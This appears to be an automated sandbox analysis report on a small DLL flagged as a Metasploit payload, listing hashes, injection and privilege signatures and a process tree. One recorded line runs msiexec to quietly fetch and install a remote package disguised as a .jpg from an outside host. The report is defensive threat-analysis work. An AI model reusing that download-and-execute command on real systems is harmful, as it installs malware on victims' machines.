Analysis
-
max time kernel
39s -
max time network
42s -
platform
windows7_x64 -
resource
win7-20220715-en -
resource tags
arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system -
submitted
24-07-2022 17:23
Behavioral task
behavioral1
Sample
57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
Resource
win10v2004-20220721-en
General
-
Target
57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
-
Size
5KB
-
MD5
f768a1ec913aea0915bcc20c17896be3
-
SHA1
a362956664379ff9860a3c56fb1daf6e000220c4
-
SHA256
57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a
-
SHA512
9fa8de6d9c4736dd0300e334137d3e60e42860f7b70dd452b35d515b3d7ebca0ef942d3bc65613d6be8e91a4f93c4c58b4e81d99649a9941cfafb46185f6dc9d
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 1224 msiexec.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
rundll32.exedescription pid process target process PID 1644 set thread context of 960 1644 rundll32.exe rundll32.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 1224 msiexec.exe Token: SeIncreaseQuotaPrivilege 1224 msiexec.exe Token: SeRestorePrivilege 1504 msiexec.exe Token: SeTakeOwnershipPrivilege 1504 msiexec.exe Token: SeSecurityPrivilege 1504 msiexec.exe Token: SeCreateTokenPrivilege 1224 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1224 msiexec.exe Token: SeLockMemoryPrivilege 1224 msiexec.exe Token: SeIncreaseQuotaPrivilege 1224 msiexec.exe Token: SeMachineAccountPrivilege 1224 msiexec.exe Token: SeTcbPrivilege 1224 msiexec.exe Token: SeSecurityPrivilege 1224 msiexec.exe Token: SeTakeOwnershipPrivilege 1224 msiexec.exe Token: SeLoadDriverPrivilege 1224 msiexec.exe Token: SeSystemProfilePrivilege 1224 msiexec.exe Token: SeSystemtimePrivilege 1224 msiexec.exe Token: SeProfSingleProcessPrivilege 1224 msiexec.exe Token: SeIncBasePriorityPrivilege 1224 msiexec.exe Token: SeCreatePagefilePrivilege 1224 msiexec.exe Token: SeCreatePermanentPrivilege 1224 msiexec.exe Token: SeBackupPrivilege 1224 msiexec.exe Token: SeRestorePrivilege 1224 msiexec.exe Token: SeShutdownPrivilege 1224 msiexec.exe Token: SeDebugPrivilege 1224 msiexec.exe Token: SeAuditPrivilege 1224 msiexec.exe Token: SeSystemEnvironmentPrivilege 1224 msiexec.exe Token: SeChangeNotifyPrivilege 1224 msiexec.exe Token: SeRemoteShutdownPrivilege 1224 msiexec.exe Token: SeUndockPrivilege 1224 msiexec.exe Token: SeSyncAgentPrivilege 1224 msiexec.exe Token: SeEnableDelegationPrivilege 1224 msiexec.exe Token: SeManageVolumePrivilege 1224 msiexec.exe Token: SeImpersonatePrivilege 1224 msiexec.exe Token: SeCreateGlobalPrivilege 1224 msiexec.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
rundll32.exerundll32.exerundll32.exedescription pid process target process PID 1564 wrote to memory of 1644 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 1644 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 1644 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 1644 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 1644 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 1644 1564 rundll32.exe rundll32.exe PID 1564 wrote to memory of 1644 1564 rundll32.exe rundll32.exe PID 1644 wrote to memory of 960 1644 rundll32.exe rundll32.exe PID 1644 wrote to memory of 960 1644 rundll32.exe rundll32.exe PID 1644 wrote to memory of 960 1644 rundll32.exe rundll32.exe PID 1644 wrote to memory of 960 1644 rundll32.exe rundll32.exe PID 1644 wrote to memory of 960 1644 rundll32.exe rundll32.exe PID 1644 wrote to memory of 960 1644 rundll32.exe rundll32.exe PID 1644 wrote to memory of 960 1644 rundll32.exe rundll32.exe PID 1644 wrote to memory of 960 1644 rundll32.exe rundll32.exe PID 960 wrote to memory of 1224 960 rundll32.exe msiexec.exe PID 960 wrote to memory of 1224 960 rundll32.exe msiexec.exe PID 960 wrote to memory of 1224 960 rundll32.exe msiexec.exe PID 960 wrote to memory of 1224 960 rundll32.exe msiexec.exe PID 960 wrote to memory of 1224 960 rundll32.exe msiexec.exe PID 960 wrote to memory of 1224 960 rundll32.exe msiexec.exe PID 960 wrote to memory of 1224 960 rundll32.exe msiexec.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll,#12⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemsiexec /i https://dl.eqwauemt.com/Downupdatesoftmakerup.jpg /q4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/960-56-0x000000000062178C-mapping.dmp
-
memory/1224-58-0x0000000000000000-mapping.dmp
-
memory/1504-60-0x000007FEFC211000-0x000007FEFC213000-memory.dmpFilesize
8KB
-
memory/1644-54-0x0000000000000000-mapping.dmp
-
memory/1644-55-0x00000000763E1000-0x00000000763E3000-memory.dmpFilesize
8KB